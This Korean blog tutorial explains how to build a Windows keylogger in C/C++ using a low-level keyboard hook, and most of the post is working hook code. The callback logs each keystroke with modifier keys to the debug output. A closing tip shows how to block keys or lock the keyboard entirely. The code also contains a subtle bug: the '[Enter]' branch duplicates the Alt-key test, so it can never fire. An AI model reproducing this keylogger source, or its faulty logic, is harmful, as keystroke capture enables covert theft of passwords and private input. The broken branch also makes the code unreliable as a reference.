[C/C++] 키보드 메시지 후킹을 이용한 키로거 만들기

Windows Keyboard Message Hooking

마우스 후킹 포스팅이 끝나자마자 이번엔 키보드 후킹입니다. 키보드 후킹은 예로부터 악의적인 목적으로 많이 사용이 되어왔지만, 순기능으로 활용할 수 있기때문에 키로거에 대해 한번 알아보도록 하겠습니다.

 

마우스 후킹에 대해 궁금하신분은 저번 포스팅을 참고하세요

https://wendys.tistory.com/111

[C/C++] 윈도우 마우스 후킹으로 제스처 인식 프로그램 만들기 (마무리)

키보드 후킹

키보드 후킹의 기본은 사용자의 입력 -> 시스템으로 전달 -> 응용프로그램으로 전달 의 순서로 동작을 하게 되는데, 이때 시스템에서 응용프로그램으로 값을 전달하는 시점에 키보드 데이터를 가로채서 변조 또는 차단 혹은 키 데이터를 기록하는 등의 행위를 하는 방법입니다.

 

 

How to keyboard hooking

키보드 후킹도 마우스 후킹과 마찬가지로 SetWindowsHookExW API를 사용하게 됩니다.

https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexa

SetWindowsHookExA function (winuser.h)

마우스 후킹때처럼 WH_KEYBOARD와 WH_KEYBOARD_LL 중 Low Level Event를 전달받을 수 있는 WH_KEYBOARD_LL 이벤트를 전달받을 예정입니다.

 

Keyboard Hooking Source

bool attach(
    __in HINSTANCE module
    ) {
    _hook = SetWindowsHookExW(WH_KEYBOARD_LL, proxy_function, module, 0);
    return _hook != nullptr;
}

 

LRESULT hook_keyboard_callback::new_function(
    __in int code,
    __in WPARAM wparam,
    __in LPARAM lparam
    ) {

    do {
        if (code < HC_ACTION) {
            break;
        }

        KBDLLHOOKSTRUCT* keyboard_param = (KBDLLHOOKSTRUCT*)lparam;
        if (WM_KEYDOWN == wparam) {

            //
            // VK CODE : https://docs.microsoft.com/ko-kr/windows/win32/inputdev/virtual-key-codes
            //

            if (0x00 < keyboard_param->vkCode && 0xFF > keyboard_param->vkCode) {
                const char key = keyboard_param->vkCode;

                std::string log_message;

                if (GetAsyncKeyState(VK_LCONTROL) & 0x8000 || GetAsyncKeyState(VK_RCONTROL) & 0x8000) {
                    log_message.append("[Ctrl]");
                }
                else if (GetAsyncKeyState(VK_LSHIFT) & 0x8000 || GetAsyncKeyState(VK_RSHIFT) & 0x8000) {
                    log_message.append("[Shift]");
                }
                else if (GetAsyncKeyState(VK_LMENU) & 0x8000 || GetAsyncKeyState(VK_RMENU) & 0x8000) {
                    log_message.append("[Alt]");
                }
                else if (GetAsyncKeyState(VK_LMENU) & 0x8000 || GetAsyncKeyState(VK_RMENU) & 0x8000) {
                    log_message.append("[Enter]");
                }
                else {
                    // ...
                }

                if (0x30 <= keyboard_param->vkCode && 0x5A >= keyboard_param->vkCode) {
                    log_message.push_back(key);
                }
                else if(VK_BACK == keyboard_param->vkCode) {
                    log_message.append("[Backspace]");
                }
                else {
                    // ...
                }

                OutputDebugStringA(log_message.c_str());
            }
        }

    } while (false);

    return ::CallNextHookEx(_hook, code, wparam, lparam);
}

키보드 후킹에서는 KBDLLHOOKSTRUCT* 값이 전달되어 오게되는데, 구조체를 보면 다음과 같은 구조를 가지고 있습니다.

typedef struct tagKBDLLHOOKSTRUCT {
  DWORD     vkCode;
  DWORD     scanCode;
  DWORD     flags;
  DWORD     time;
  ULONG_PTR dwExtraInfo;
} KBDLLHOOKSTRUCT, *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;

여기서 가장 중요한 vkCode는 어떤 키가 눌렸는지를 확인할 수 있으며, KV_LBUTTON (0x01) ~ KV_OEM_CLEAR (0 xFE)까지 입력되어 들어올 수 있습니다.

위의 키 중 조합키로 넘어오는 경우는 따로따로 처리를 해주어야 합니다. 처음 컨트롤 키를 누르면 vkCode = VK_LCONTROL 이벤트가 들어오게 되고 그 상태에서 A 키를 누르게 되면 vkCode = 'A'가 들어있게 됩니다.

 

[Ctrl] + 'A'를 눌렀다고 판단을 하기 위해선 어떻게 처리를 해주어야 할까요?

이때 사용하는 API가 GetAsyncKeyState입니다. 근데 위에 사용했을 때 왜 GetAsyncKeyState(Key & 0x8000) 처리를 해주었을까요?

바로 해당 함수의 사용법입니다. 0x8000 값은 현재 키가 눌려져 있는지 상태 값을 나타내게 되고 0x0001 은 저번 호출 시점과 이번 호출 사이에 키가 눌려진 적이 있는지 확인하기 위한 값입니다.

키로거에서는 이전에 눌려졌던 상태는 필요 없기 때문에 0x8001 값을 체크할 필요가 없습니다.

 

TIP MSDN에서는 현재 키보드 상태 값을 확인할 필요가 있는 경우 GetKeyState가 아닌 GetAsyncKeyState의 사용을 권장하고 있습니다. GetAsyncKeyState는 실제 키보드 값을 가져오고 GetKeyState는 메시 지큐에 따라 값이 변할 수 있기 때문입니다.

 

Sample

 

 

테스트를 한번 해보았습니다. 키보드 보안 프로그램 등이 실행 중인 경우에는 소용이 없겠지만, 위와 같이 했을 때 다음과 같이 키보드 입력을 캡처할 수 있었습니다.

 

TIP 만약 특정 키를 입력할 수 없도록 하거나, 키보드를 먹통으로 만들고싶다면 CallNextHookEx를 호출하기 전에 return 1 처리를 통하여 간단하게 처리할 수 있습니다.